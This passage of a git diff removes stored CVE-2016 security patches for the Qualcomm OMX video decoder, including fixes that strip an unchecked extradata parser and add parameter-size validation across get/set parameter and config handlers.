-- pDestBuf = m_vendor_config.pData;
--
-- DEBUG_PRINT_LOW("Rxd SPS+PPS nPortIndex[%u] len[%u] data[%p]",
-- (unsigned int)m_vendor_config.nPortIndex,
-- (unsigned int)m_vendor_config.nDataSize,
-- m_vendor_config.pData);
-- while (index < 2) {
-- uint8 *psize;
-- len = *pSrcBuf;
-- len = len << 8;
-- len |= *(pSrcBuf + 1);
-- psize = (uint8 *) & len;
-- memcpy(pDestBuf + nal_length, pSrcBuf + 2,len);
-- for (unsigned int i = 0; i < nal_length; i++) {
-- pDestBuf[i] = psize[nal_length - 1 - i];
-- }
-- //memcpy(pDestBuf,pSrcBuf,(len+2));
-- pDestBuf += len + nal_length;
-- pSrcBuf += len + 2;
-- index++;
-- pSrcBuf++; // skip picture param set
-- len = 0;
-- }
-- } else if (!strcmp(drv_ctx.kind, "OMX.qcom.video.decoder.mpeg4") ||
-- !strcmp(drv_ctx.kind, "OMX.qcom.video.decoder.mpeg2")) {
-- m_vendor_config.nPortIndex = config->nPortIndex;
-- m_vendor_config.nDataSize = config->nDataSize;
-- m_vendor_config.pData = (OMX_U8 *) malloc((config->nDataSize));
-- memcpy(m_vendor_config.pData, config->pData,config->nDataSize);
-- } else if (!strcmp(drv_ctx.kind, "OMX.qcom.video.decoder.vc1")) {
-- if (m_vendor_config.pData) {
-- free(m_vendor_config.pData);
-- m_vendor_config.pData = NULL;
-- m_vendor_config.nDataSize = 0;
-- }
--
-- if (((*((OMX_U32 *) config->pData)) &
-- VC1_SP_MP_START_CODE_MASK) ==
-- VC1_SP_MP_START_CODE) {
-- DEBUG_PRINT_LOW("set_config - VC1 simple/main profile");
-- m_vendor_config.nPortIndex = config->nPortIndex;
-- m_vendor_config.nDataSize = config->nDataSize;
-- m_vendor_config.pData =
-- (OMX_U8 *) malloc(config->nDataSize);
-- memcpy(m_vendor_config.pData, config->pData,
-- config->nDataSize);
-- m_vc1_profile = VC1_SP_MP_RCV;
-- } else if (*((OMX_U32 *) config->pData) == VC1_AP_SEQ_START_CODE) {
-- DEBUG_PRINT_LOW("set_config - VC1 Advance profile");
-- m_vendor_config.nPortIndex = config->nPortIndex;
-- m_vendor_config.nDataSize = config->nDataSize;
-- m_vendor_config.pData =
-- (OMX_U8 *) malloc((config->nDataSize));
-- memcpy(m_vendor_config.pData, config->pData,
-- config->nDataSize);
-- m_vc1_profile = VC1_AP;
-- } else if ((config->nDataSize == VC1_STRUCT_C_LEN)) {
-- DEBUG_PRINT_LOW("set_config - VC1 Simple/Main profile struct C only");
-- m_vendor_config.nPortIndex = config->nPortIndex;
-- m_vendor_config.nDataSize = config->nDataSize;
-- m_vendor_config.pData = (OMX_U8*)malloc(config->nDataSize);
-- memcpy(m_vendor_config.pData,config->pData,config->nDataSize);
-- m_vc1_profile = VC1_SP_MP_RCV;
-- } else {
-- DEBUG_PRINT_LOW("set_config - Error: Unknown VC1 profile");
-- }
-- }
-- return ret;
-- } else if (configIndex == OMX_IndexConfigVideoNalSize) {
-+ if (configIndex == OMX_IndexConfigVideoNalSize) {
- struct v4l2_control temp;
- temp.id = V4L2_CID_MPEG_VIDC_VIDEO_STREAM_FORMAT;
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2477/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-2477/ANY/0001.patch.base64
deleted file mode 100644
index d5f478b9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2477/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-2478/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2478/ANY/0001.patch
deleted file mode 100644
index 420fbeff..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2478/ANY/0001.patch
+++ /dev/null
@@ -1,116 +0,0 @@
-diff --git a/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp b/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-index 3b84707..977aef2 100644
---- a/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-+++ b/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-@@ -4272,110 +4272,7 @@
-
- DEBUG_PRINT_LOW("Set Config Called");
-
-- if (configIndex == (OMX_INDEXTYPE)OMX_IndexVendorVideoExtraData) {
-- OMX_VENDOR_EXTRADATATYPE *config = (OMX_VENDOR_EXTRADATATYPE *) configData;
-- DEBUG_PRINT_LOW("Index OMX_IndexVendorVideoExtraData called");
-- if (!strcmp(drv_ctx.kind, "OMX.qcom.video.decoder.avc") ||
-- !strcmp(drv_ctx.kind, "OMX.qcom.video.decoder.mvc")) {
-- DEBUG_PRINT_LOW("Index OMX_IndexVendorVideoExtraData AVC");
-- OMX_U32 extra_size;
-- // Parsing done here for the AVC atom is definitely not generic
-- // Currently this piece of code is working, but certainly
-- // not tested with all .mp4 files.
-- // Incase of failure, we might need to revisit this
-- // for a generic piece of code.
--
-- // Retrieve size of NAL length field
-- // byte #4 contains the size of NAL lenght field
-- nal_length = (config->pData[4] & 0x03) + 1;
--
-- extra_size = 0;
-- if (nal_length > 2) {
-- /* Presently we assume that only one SPS and one PPS in AvC1 Atom */
-- extra_size = (nal_length - 2) * 2;
-- }
--
-- // SPS starts from byte #6
-- OMX_U8 *pSrcBuf = (OMX_U8 *) (&config->pData[6]);
-- OMX_U8 *pDestBuf;
-- m_vendor_config.nPortIndex = config->nPortIndex;
--
-- // minus 6 --> SPS starts from byte #6
-- // minus 1 --> picture param set byte to be ignored from avcatom
-- m_vendor_config.nDataSize = config->nDataSize - 6 - 1 + extra_size;
-- m_vendor_config.pData = (OMX_U8 *) malloc(m_vendor_config.nDataSize);
-- OMX_U32 len;
-- OMX_U8 index = 0;
-- // case where SPS+PPS is sent as part of set_config
-- pDestBuf = m_vendor_config.pData;
--
-- DEBUG_PRINT_LOW("Rxd SPS+PPS nPortIndex[%u] len[%u] data[%p]",
-- (unsigned int)m_vendor_config.nPortIndex,
-- (unsigned int)m_vendor_config.nDataSize,
-- m_vendor_config.pData);
-- while (index < 2) {
-- uint8 *psize;
-- len = *pSrcBuf;
-- len = len << 8;
-- len |= *(pSrcBuf + 1);
-- psize = (uint8 *) & len;
-- memcpy(pDestBuf + nal_length, pSrcBuf + 2,len);
-- for (unsigned int i = 0; i < nal_length; i++) {
-- pDestBuf[i] = psize[nal_length - 1 - i];
-- }
-- //memcpy(pDestBuf,pSrcBuf,(len+2));
-- pDestBuf += len + nal_length;
-- pSrcBuf += len + 2;
-- index++;
-- pSrcBuf++; // skip picture param set
-- len = 0;
-- }
-- } else if (!strcmp(drv_ctx.kind, "OMX.qcom.video.decoder.mpeg4") ||
-- !strcmp(drv_ctx.kind, "OMX.qcom.video.decoder.mpeg2")) {
-- m_vendor_config.nPortIndex = config->nPortIndex;
-- m_vendor_config.nDataSize = config->nDataSize;
-- m_vendor_config.pData = (OMX_U8 *) malloc((config->nDataSize));
-- memcpy(m_vendor_config.pData, config->pData,config->nDataSize);
-- } else if (!strcmp(drv_ctx.kind, "OMX.qcom.video.decoder.vc1")) {
-- if (m_vendor_config.pData) {
-- free(m_vendor_config.pData);
-- m_vendor_config.pData = NULL;
-- m_vendor_config.nDataSize = 0;
-- }
--
-- if (((*((OMX_U32 *) config->pData)) &
-- VC1_SP_MP_START_CODE_MASK) ==
-- VC1_SP_MP_START_CODE) {
-- DEBUG_PRINT_LOW("set_config - VC1 simple/main profile");
-- m_vendor_config.nPortIndex = config->nPortIndex;
-- m_vendor_config.nDataSize = config->nDataSize;
-- m_vendor_config.pData =
-- (OMX_U8 *) malloc(config->nDataSize);
-- memcpy(m_vendor_config.pData, config->pData,
-- config->nDataSize);
-- m_vc1_profile = VC1_SP_MP_RCV;
-- } else if (*((OMX_U32 *) config->pData) == VC1_AP_SEQ_START_CODE) {
-- DEBUG_PRINT_LOW("set_config - VC1 Advance profile");
-- m_vendor_config.nPortIndex = config->nPortIndex;
-- m_vendor_config.nDataSize = config->nDataSize;
-- m_vendor_config.pData =
-- (OMX_U8 *) malloc((config->nDataSize));
-- memcpy(m_vendor_config.pData, config->pData,
-- config->nDataSize);
-- m_vc1_profile = VC1_AP;
-- } else if ((config->nDataSize == VC1_STRUCT_C_LEN)) {
-- DEBUG_PRINT_LOW("set_config - VC1 Simple/Main profile struct C only");
-- m_vendor_config.nPortIndex = config->nPortIndex;
-- m_vendor_config.nDataSize = config->nDataSize;
-- m_vendor_config.pData = (OMX_U8*)malloc(config->nDataSize);
-- memcpy(m_vendor_config.pData,config->pData,config->nDataSize);
-- m_vc1_profile = VC1_SP_MP_RCV;
-- } else {
-- DEBUG_PRINT_LOW("set_config - Error: Unknown VC1 profile");
-- }
-- }
-- return ret;
-- } else if (configIndex == OMX_IndexConfigVideoNalSize) {
-+ if (configIndex == OMX_IndexConfigVideoNalSize) {
- struct v4l2_control temp;
- temp.id = V4L2_CID_MPEG_VIDC_VIDEO_STREAM_FORMAT;
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2478/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-2478/ANY/0001.patch.base64
deleted file mode 100644
index d5f478b9..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2478/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-2480/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2480/ANY/0001.patch
deleted file mode 100644
index ad8516e6..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2480/ANY/0001.patch
+++ /dev/null
@@ -1,1138 +0,0 @@
-diff --git a/mm-core/inc/OMX_QCOMExtns.h b/mm-core/inc/OMX_QCOMExtns.h
-index f0e1593..eb1b990 100644
---- a/mm-core/inc/OMX_QCOMExtns.h
-+++ b/mm-core/inc/OMX_QCOMExtns.h
-@@ -1,5 +1,5 @@
- /*--------------------------------------------------------------------------
--Copyright (c) 2009-2015, The Linux Foundation. All rights reserved.
-+Copyright (c) 2009-2016, The Linux Foundation. All rights reserved.
-
- Redistribution and use in source and binary forms, with or without
- modification, are permitted provided that the following conditions are met:
-@@ -1348,6 +1348,8 @@
- } QOMX_VIDEO_QUERY_DECODER_INSTANCES;
-
- typedef struct QOMX_ENABLETYPE {
-+ OMX_U32 nSize;
-+ OMX_VERSIONTYPE nVersion;
- OMX_BOOL bEnable;
- } QOMX_ENABLETYPE;
-
-@@ -1451,6 +1453,8 @@
-
-
- typedef struct QOMX_RECTTYPE {
-+ OMX_U32 nSize;
-+ OMX_VERSIONTYPE nVersion;
- OMX_S32 nLeft;
- OMX_S32 nTop;
- OMX_U32 nWidth;
-@@ -1551,7 +1555,6 @@
- QOMX_VIDEO_HIERARCHICALCODINGTYPE eHierarchicalCodingType;
- } QOMX_VIDEO_HIERARCHICALLAYERS;
-
--
- #ifdef __cplusplus
- }
- #endif /* __cplusplus */
-diff --git a/mm-video-v4l2/vidc/common/inc/vidc_debug.h b/mm-video-v4l2/vidc/common/inc/vidc_debug.h
-index d7a158c..0ce747c 100755
---- a/mm-video-v4l2/vidc/common/inc/vidc_debug.h
-+++ b/mm-video-v4l2/vidc/common/inc/vidc_debug.h
-@@ -1,5 +1,5 @@
- /*--------------------------------------------------------------------------
--Copyright (c) 2013, The Linux Foundation. All rights reserved.
-+Copyright (c) 2013 - 2016, The Linux Foundation. All rights reserved.
-
- Redistribution and use in source and binary forms, with or without
- modification, are permitted provided that the following conditions are met:
-@@ -64,4 +64,15 @@
- #define DEBUG_PRINT_HIGH printf
- #endif
-
-+#define VALIDATE_OMX_PARAM_DATA(ptr, paramType) \
-+ { \
-+ if (ptr == NULL) { return OMX_ErrorBadParameter; } \
-+ paramType *p = reinterpret_cast(ptr); \
-+ if (p->nSize < sizeof(paramType)) { \
-+ ALOGE("Insufficient object size(%u) v/s expected(%zu) for type %s",\
-+ (unsigned int)p->nSize, sizeof(paramType), #paramType); \
-+ return OMX_ErrorBadParameter; \
-+ } \
-+ } \
-+
- #endif
-diff --git a/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp b/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-index 19c1596..3b84707 100644
---- a/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-+++ b/mm-video-v4l2/vidc/vdec/src/omx_vdec_msm8974.cpp
-@@ -2979,6 +2979,7 @@
- }
- switch ((unsigned long)paramIndex) {
- case OMX_IndexParamPortDefinition: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_PORTDEFINITIONTYPE);
- OMX_PARAM_PORTDEFINITIONTYPE *portDefn =
- (OMX_PARAM_PORTDEFINITIONTYPE *) paramData;
- DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamPortDefinition");
-@@ -2988,23 +2989,25 @@
- break;
- }
- case OMX_IndexParamVideoInit: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PORT_PARAM_TYPE);
- OMX_PORT_PARAM_TYPE *portParamType =
- (OMX_PORT_PARAM_TYPE *) paramData;
- DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoInit");
-
- portParamType->nVersion.nVersion = OMX_SPEC_VERSION;
-- portParamType->nSize = sizeof(portParamType);
-+ portParamType->nSize = sizeof(OMX_PORT_PARAM_TYPE);
- portParamType->nPorts = 2;
- portParamType->nStartPortNumber = 0;
- break;
- }
- case OMX_IndexParamVideoPortFormat: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_PORTFORMATTYPE);
- OMX_VIDEO_PARAM_PORTFORMATTYPE *portFmt =
- (OMX_VIDEO_PARAM_PORTFORMATTYPE *)paramData;
- DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoPortFormat");
-
- portFmt->nVersion.nVersion = OMX_SPEC_VERSION;
-- portFmt->nSize = sizeof(portFmt);
-+ portFmt->nSize = sizeof(OMX_VIDEO_PARAM_PORTFORMATTYPE);
-
- if (0 == portFmt->nPortIndex) {
- if (0 == portFmt->nIndex) {
-@@ -3046,22 +3049,24 @@
- }
- /*Component should support this port definition*/
- case OMX_IndexParamAudioInit: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PORT_PARAM_TYPE);
- OMX_PORT_PARAM_TYPE *audioPortParamType =
- (OMX_PORT_PARAM_TYPE *) paramData;
- DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamAudioInit");
- audioPortParamType->nVersion.nVersion = OMX_SPEC_VERSION;
-- audioPortParamType->nSize = sizeof(audioPortParamType);
-+ audioPortParamType->nSize = sizeof(OMX_PORT_PARAM_TYPE);
- audioPortParamType->nPorts = 0;
- audioPortParamType->nStartPortNumber = 0;
- break;
- }
- /*Component should support this port definition*/
- case OMX_IndexParamImageInit: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PORT_PARAM_TYPE);
- OMX_PORT_PARAM_TYPE *imagePortParamType =
- (OMX_PORT_PARAM_TYPE *) paramData;
- DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamImageInit");
- imagePortParamType->nVersion.nVersion = OMX_SPEC_VERSION;
-- imagePortParamType->nSize = sizeof(imagePortParamType);
-+ imagePortParamType->nSize = sizeof(OMX_PORT_PARAM_TYPE);
- imagePortParamType->nPorts = 0;
- imagePortParamType->nStartPortNumber = 0;
- break;
-@@ -3075,6 +3080,7 @@
- break;
- }
- case OMX_IndexParamStandardComponentRole: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_COMPONENTROLETYPE);
- OMX_PARAM_COMPONENTROLETYPE *comp_role;
- comp_role = (OMX_PARAM_COMPONENTROLETYPE *) paramData;
- comp_role->nVersion.nVersion = OMX_SPEC_VERSION;
-@@ -3088,22 +3094,23 @@
- }
- /* Added for parameter test */
- case OMX_IndexParamPriorityMgmt: {
--
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PRIORITYMGMTTYPE);
- OMX_PRIORITYMGMTTYPE *priorityMgmType =
- (OMX_PRIORITYMGMTTYPE *) paramData;
- DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamPriorityMgmt");
- priorityMgmType->nVersion.nVersion = OMX_SPEC_VERSION;
-- priorityMgmType->nSize = sizeof(priorityMgmType);
-+ priorityMgmType->nSize = sizeof(OMX_PRIORITYMGMTTYPE);
-
- break;
- }
- /* Added for parameter test */
- case OMX_IndexParamCompBufferSupplier: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_BUFFERSUPPLIERTYPE);
- OMX_PARAM_BUFFERSUPPLIERTYPE *bufferSupplierType =
- (OMX_PARAM_BUFFERSUPPLIERTYPE*) paramData;
- DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamCompBufferSupplier");
-
-- bufferSupplierType->nSize = sizeof(bufferSupplierType);
-+ bufferSupplierType->nSize = sizeof(OMX_PARAM_BUFFERSUPPLIERTYPE);
- bufferSupplierType->nVersion.nVersion = OMX_SPEC_VERSION;
- if (0 == bufferSupplierType->nPortIndex)
- bufferSupplierType->nPortIndex = OMX_BufferSupplyUnspecified;
-@@ -3141,6 +3148,7 @@
- break;
- }
- case OMX_IndexParamVideoProfileLevelQuerySupported: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_PROFILELEVELTYPE);
- DEBUG_PRINT_LOW("get_parameter: OMX_IndexParamVideoProfileLevelQuerySupported %08x", paramIndex);
- OMX_VIDEO_PARAM_PROFILELEVELTYPE *profileLevelType =
- (OMX_VIDEO_PARAM_PROFILELEVELTYPE *)paramData;
-@@ -3149,6 +3157,7 @@
- }
- #if defined (_ANDROID_HONEYCOMB_) || defined (_ANDROID_ICS_)
- case OMX_GoogleAndroidIndexGetAndroidNativeBufferUsage: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, GetAndroidNativeBufferUsageParams);
- DEBUG_PRINT_LOW("get_parameter: OMX_GoogleAndroidIndexGetAndroidNativeBufferUsage");
- GetAndroidNativeBufferUsageParams* nativeBuffersUsage = (GetAndroidNativeBufferUsageParams *) paramData;
- if (nativeBuffersUsage->nPortIndex == OMX_CORE_OUTPUT_PORT_INDEX) {
-@@ -3172,6 +3181,7 @@
- #ifdef FLEXYUV_SUPPORTED
- case OMX_QcomIndexFlexibleYUVDescription: {
- DEBUG_PRINT_LOW("get_parameter: describeColorFormat");
-+ VALIDATE_OMX_PARAM_DATA(paramData, DescribeColorFormatParams);
- eRet = describeColorFormat(paramData);
- break;
- }
-@@ -3282,6 +3292,7 @@
- }
- switch ((unsigned long)paramIndex) {
- case OMX_IndexParamPortDefinition: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_PORTDEFINITIONTYPE);
- OMX_PARAM_PORTDEFINITIONTYPE *portDefn;
- portDefn = (OMX_PARAM_PORTDEFINITIONTYPE *) paramData;
- //TODO: Check if any allocate buffer/use buffer/useNativeBuffer has
-@@ -3525,6 +3536,7 @@
- }
- break;
- case OMX_IndexParamVideoPortFormat: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_PORTFORMATTYPE);
- OMX_VIDEO_PARAM_PORTFORMATTYPE *portFmt =
- (OMX_VIDEO_PARAM_PORTFORMATTYPE *)paramData;
- int ret=0;
-@@ -3571,6 +3583,7 @@
- break;
-
- case OMX_QcomIndexPortDefn: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_PARAM_PORTDEFINITIONTYPE);
- OMX_QCOM_PARAM_PORTDEFINITIONTYPE *portFmt =
- (OMX_QCOM_PARAM_PORTDEFINITIONTYPE *) paramData;
- DEBUG_PRINT_LOW("set_parameter: OMX_IndexQcomParamPortDefinitionType %u",
-@@ -3617,6 +3630,7 @@
- break;
-
- case OMX_IndexParamStandardComponentRole: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_COMPONENTROLETYPE);
- OMX_PARAM_COMPONENTROLETYPE *comp_role;
- comp_role = (OMX_PARAM_COMPONENTROLETYPE *) paramData;
- DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamStandardComponentRole %s",
-@@ -3707,6 +3721,7 @@
- }
-
- case OMX_IndexParamPriorityMgmt: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PRIORITYMGMTTYPE);
- if (m_state != OMX_StateLoaded) {
- DEBUG_PRINT_ERROR("Set Parameter called in Invalid State");
- return OMX_ErrorIncorrectStateOperation;
-@@ -3725,6 +3740,7 @@
- }
-
- case OMX_IndexParamCompBufferSupplier: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_PARAM_BUFFERSUPPLIERTYPE);
- OMX_PARAM_BUFFERSUPPLIERTYPE *bufferSupplierType = (OMX_PARAM_BUFFERSUPPLIERTYPE*) paramData;
- DEBUG_PRINT_LOW("set_parameter: OMX_IndexParamCompBufferSupplier %d",
- bufferSupplierType->eBufferSupplier);
-@@ -3764,6 +3780,7 @@
- break;
- }
- case OMX_QcomIndexParamVideoDecoderPictureOrder: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_VIDEO_DECODER_PICTURE_ORDER);
- QOMX_VIDEO_DECODER_PICTURE_ORDER *pictureOrder =
- (QOMX_VIDEO_DECODER_PICTURE_ORDER *)paramData;
- struct v4l2_control control;
-@@ -3789,42 +3806,52 @@
- break;
- }
- case OMX_QcomIndexParamConcealMBMapExtraData:
-+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_ENABLETYPE);
- eRet = enable_extradata(VDEC_EXTRADATA_MB_ERROR_MAP, false,
- ((QOMX_ENABLETYPE *)paramData)->bEnable);
- break;
- case OMX_QcomIndexParamFrameInfoExtraData:
-+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_ENABLETYPE);
- eRet = enable_extradata(OMX_FRAMEINFO_EXTRADATA, false,
- ((QOMX_ENABLETYPE *)paramData)->bEnable);
- break;
- case OMX_ExtraDataFrameDimension:
-+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_ENABLETYPE);
- eRet = enable_extradata(OMX_FRAMEDIMENSION_EXTRADATA, false,
- ((QOMX_ENABLETYPE *)paramData)->bEnable);
- break;
- case OMX_QcomIndexParamInterlaceExtraData:
-+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_ENABLETYPE);
- eRet = enable_extradata(OMX_INTERLACE_EXTRADATA, false,
- ((QOMX_ENABLETYPE *)paramData)->bEnable);
- break;
- case OMX_QcomIndexParamH264TimeInfo:
-+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_ENABLETYPE);
- eRet = enable_extradata(OMX_TIMEINFO_EXTRADATA, false,
- ((QOMX_ENABLETYPE *)paramData)->bEnable);
- break;
- case OMX_QcomIndexParamVideoFramePackingExtradata:
-+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_ENABLETYPE);
- eRet = enable_extradata(OMX_FRAMEPACK_EXTRADATA, false,
- ((QOMX_ENABLETYPE *)paramData)->bEnable);
- break;
- case OMX_QcomIndexParamVideoQPExtraData:
-+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_ENABLETYPE);
- eRet = enable_extradata(OMX_QP_EXTRADATA, false,
- ((QOMX_ENABLETYPE *)paramData)->bEnable);
- break;
- case OMX_QcomIndexParamVideoInputBitsInfoExtraData:
-+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_ENABLETYPE);
- eRet = enable_extradata(OMX_BITSINFO_EXTRADATA, false,
- ((QOMX_ENABLETYPE *)paramData)->bEnable);
- break;
- case OMX_QcomIndexEnableExtnUserData:
-+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_ENABLETYPE);
- eRet = enable_extradata(OMX_EXTNUSER_EXTRADATA, false,
- ((QOMX_ENABLETYPE *)paramData)->bEnable);
- break;
- case OMX_QcomIndexParamMpeg2SeqDispExtraData:
-+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_ENABLETYPE);
- eRet = enable_extradata(OMX_MPEG2SEQDISP_EXTRADATA, false,
- ((QOMX_ENABLETYPE *)paramData)->bEnable);
- break;
-@@ -3833,6 +3860,7 @@
- }
- break;
- case OMX_QcomIndexPlatformPvt: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_QCOM_PLATFORMPRIVATE_EXTN);
- DEBUG_PRINT_HIGH("set_parameter: OMX_QcomIndexPlatformPvt OP Port");
- OMX_QCOM_PLATFORMPRIVATE_EXTN* entryType = (OMX_QCOM_PLATFORMPRIVATE_EXTN *) paramData;
- if (entryType->type != OMX_QCOM_PLATFORM_PRIVATE_PMEM) {
-@@ -3883,6 +3911,7 @@
- break;
-
- case OMX_QcomIndexParamIndexExtraDataType: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_INDEXEXTRADATATYPE);
- QOMX_INDEXEXTRADATATYPE *extradataIndexType = (QOMX_INDEXEXTRADATATYPE *) paramData;
- if ((extradataIndexType->nIndex == OMX_IndexParamPortDefinition) &&
- (extradataIndexType->bEnabled == OMX_TRUE) &&
-@@ -3906,6 +3935,7 @@
- * state. This is ANDROID architecture which is not in sync
- * with openmax standard. */
- case OMX_GoogleAndroidIndexEnableAndroidNativeBuffers: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, EnableAndroidNativeBuffersParams);
- EnableAndroidNativeBuffersParams* enableNativeBuffers = (EnableAndroidNativeBuffersParams *) paramData;
- if (enableNativeBuffers) {
- m_enable_android_native_buffers = enableNativeBuffers->enable;
-@@ -3922,11 +3952,13 @@
- }
- break;
- case OMX_GoogleAndroidIndexUseAndroidNativeBuffer: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, UseAndroidNativeBufferParams);
- eRet = use_android_native_buffer(hComp, paramData);
- }
- break;
- #endif
- case OMX_QcomIndexParamEnableTimeStampReorder: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_INDEXTIMESTAMPREORDER);
- QOMX_INDEXTIMESTAMPREORDER *reorder = (QOMX_INDEXTIMESTAMPREORDER *)paramData;
- if (drv_ctx.picture_order == (vdec_output_order)QOMX_VIDEO_DISPLAY_ORDER) {
- if (reorder->bEnable == OMX_TRUE) {
-@@ -3943,6 +3975,7 @@
- }
- break;
- case OMX_IndexParamVideoProfileLevelCurrent: {
-+ VALIDATE_OMX_PARAM_DATA(paramData, OMX_VIDEO_PARAM_PROFILELEVELTYPE);
- OMX_VIDEO_PARAM_PROFILELEVELTYPE* pParam =
- (OMX_VIDEO_PARAM_PROFILELEVELTYPE*)paramData;
- if (pParam) {
-@@ -3954,6 +3987,7 @@
- }
- case OMX_QcomIndexParamVideoMetaBufferMode:
- {
-+ VALIDATE_OMX_PARAM_DATA(paramData, StoreMetaDataInBuffersParams);
- StoreMetaDataInBuffersParams *metabuffer =
- (StoreMetaDataInBuffersParams *)paramData;
- if (!metabuffer) {
-@@ -3996,6 +4030,7 @@
- }
- case OMX_QcomIndexParamVideoDownScalar:
- {
-+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_INDEXDOWNSCALAR);
- QOMX_INDEXDOWNSCALAR* pParam = (QOMX_INDEXDOWNSCALAR*)paramData;
- struct v4l2_control control;
- int rc;
-@@ -4024,6 +4059,7 @@
- #ifdef ADAPTIVE_PLAYBACK_SUPPORTED
- case OMX_QcomIndexParamVideoAdaptivePlaybackMode:
- {
-+ VALIDATE_OMX_PARAM_DATA(paramData, PrepareForAdaptivePlaybackParams);
- DEBUG_PRINT_LOW("set_parameter: OMX_GoogleAndroidIndexPrepareForAdaptivePlayback");
- PrepareForAdaptivePlaybackParams* pParams =
- (PrepareForAdaptivePlaybackParams *) paramData;
-@@ -4052,6 +4088,7 @@
- #endif
- case OMX_QcomIndexParamVideoCustomBufferSize:
- {
-+ VALIDATE_OMX_PARAM_DATA(paramData, QOMX_VIDEO_CUSTOM_BUFFERSIZE);
- DEBUG_PRINT_LOW("set_parameter: OMX_QcomIndexParamVideoCustomBufferSize");
- QOMX_VIDEO_CUSTOM_BUFFERSIZE* pParam = (QOMX_VIDEO_CUSTOM_BUFFERSIZE*)paramData;
- if (pParam->nPortIndex == OMX_CORE_INPUT_PORT_INDEX) {
-@@ -4115,6 +4152,7 @@
-
- switch ((unsigned long)configIndex) {
- case OMX_QcomIndexConfigInterlaced: {
-+ VALIDATE_OMX_PARAM_DATA(configData, OMX_QCOM_CONFIG_INTERLACETYPE);
- OMX_QCOM_CONFIG_INTERLACETYPE *configFmt =
- (OMX_QCOM_CONFIG_INTERLACETYPE *) configData;
- if (configFmt->nPortIndex == 1) {
-@@ -4140,6 +4178,7 @@
- break;
- }
- case OMX_QcomIndexQueryNumberOfVideoDecInstance: {
-+ VALIDATE_OMX_PARAM_DATA(configData, QOMX_VIDEO_QUERY_DECODER_INSTANCES);
- QOMX_VIDEO_QUERY_DECODER_INSTANCES *decoderinstances =
- (QOMX_VIDEO_QUERY_DECODER_INSTANCES*)configData;
- decoderinstances->nNumOfInstances = 16;
-@@ -4148,6 +4187,7 @@
- }
- case OMX_QcomIndexConfigVideoFramePackingArrangement: {
- if (drv_ctx.decoder_format == VDEC_CODECTYPE_H264) {
-+ VALIDATE_OMX_PARAM_DATA(configData, OMX_QCOM_FRAME_PACK_ARRANGEMENT);
- OMX_QCOM_FRAME_PACK_ARRANGEMENT *configFmt =
- (OMX_QCOM_FRAME_PACK_ARRANGEMENT *) configData;
- memcpy(configFmt, &m_frame_pack_arrangement,
-@@ -4158,6 +4198,7 @@
- break;
- }
- case OMX_IndexConfigCommonOutputCrop: {
-+ VALIDATE_OMX_PARAM_DATA(configData, OMX_CONFIG_RECTTYPE);
